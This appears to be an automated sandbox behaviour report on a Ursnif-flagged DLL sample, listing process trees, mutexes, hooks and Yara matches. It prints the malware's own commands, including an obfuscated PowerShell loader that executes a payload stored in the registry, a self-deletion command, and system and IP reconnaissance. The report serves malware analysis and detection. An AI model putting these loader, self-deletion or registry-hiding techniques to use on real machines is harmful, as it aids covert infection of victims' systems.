                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3A11.tmp" "c:\Users\user\AppData\Local\Temp\ykprd3xj\CSC234B0D107E494378839C776CED666FC7.TMP"
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5431.tmp" "c:\Users\user\AppData\Local\Temp\dyznokx3\CSCF033825E263E4DFC98584E77F08A80E9.TMP"
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\2oCOO5LbPu.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1E0C.bi1"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\1E0C.bi1"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\2E09.bin1"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdlineJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.cmdlineJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3A11.tmp" "c:\Users\user\AppData\Local\Temp\ykprd3xj\CSC234B0D107E494378839C776CED666FC7.TMP"Jump to behavior
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -hJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5431.tmp" "c:\Users\user\AppData\Local\Temp\dyznokx3\CSCF033825E263E4DFC98584E77F08A80E9.TMP"Jump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\2oCOO5LbPu.dll
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1E0C.bi1"
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\1E0C.bi1"
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\2E09.bin1"
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1E0C.bi1"
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eix4r5e5.krv.ps1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D68BD CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,2_2_036D68BD
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1
                      Source: C:\Windows\System32\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{60D7F404-3F23-92D7-C994-E3E60D08C77A}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3104:120:WilError_01
                      Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{5064A2E5-6FEB-0222-7984-1356BDF8F7EA}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3688:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1008:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6688:120:WilError_01
                      Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{CC5B86B9-BBE4-DE12-A5C0-1FF2A9F4C346}
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{8CCBC699-7B11-9ED8-6580-DFB269B48306}
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                      Source: C:\Windows\explorer.exeFile opened: C:\Windows\SYSTEM32\msftedit.dll
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                      Source: 2oCOO5LbPu.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.pdb8 source: powershell.exe, 00000014.00000002.566709177.0000012312B1D000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.381155615.00000000068B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.385084346.00000000068B0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: 2oCOO5LbPu.dll
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.381155615.00000000068B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.385084346.00000000068B0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.pdbXP source: powershell.exe, 00000014.00000002.568732109.0000012312B68000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D7EA0 push ecx; ret 2_2_036D7EA9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D828B push ecx; ret 2_2_036D829B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_06273495 push ecx; mov dword ptr [esp], 00000002h2_2_06273496
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_06293D9F push ecx; ret 2_2_06293DAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_06281040 push es; retf 2_2_06281041
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062938A0 push ecx; ret 2_2_062938A9
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00544492 push ss; ret 24_2_00544493
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572393793F pushfd ; retf 37_2_0000015723937940
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723954492 push ss; ret 37_2_0000015723954493
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062786AD LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,2_2_062786AD
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdlineJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.cmdlineJump to behavior
                      Source: 2oCOO5LbPu.dllStatic PE information: section name: .erloc
                      Source: ykprd3xj.dll.22.drStatic PE information: real checksum: 0x0 should be: 0x2507
                      Source: 2oCOO5LbPu.dllStatic PE information: real checksum: 0x79835 should be: 0x763dc
                      Source: dyznokx3.dll.25.drStatic PE information: real checksum: 0x0 should be: 0x14bd
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.dllJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322984868.000000000576C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274118654.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274312246.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274347577.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274283989.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274051962.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.320061792.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274249118.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274172697.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322240934.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274335301.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2284, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6680, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 7000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5180, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4724, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4960, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.52f94a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.52f94a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.36d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.586a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.5916b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.586a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.58e94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000000.388260255.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.486983679.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.443486378.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.462400330.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.558152492.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.459537251.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.477935242.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.564931591.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.457650173.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.534482367.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.471067441.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.442564309.00000000052F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.515611246.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.554617664.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.528687963.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000000.390009566.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322078024.000000000586A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322135875.00000000058E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Hooks registry keys query functions (used to hide registry keys)
                      Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
                      Self deletion via cmd delete
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\2oCOO5LbPu.dll
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\2oCOO5LbPu.dll
                      Modifies the export address table of user mode modules (user mode EAT hooks)
                      Source: explorer.exeIAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FF80250521C
                      Modifies the prolog of user mode functions (user mode inline hooks)
                      Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
                      Modifies the import address table of user mode modules (user mode IAT hooks)
                      Source: explorer.exeEAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FF802505200
                      Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
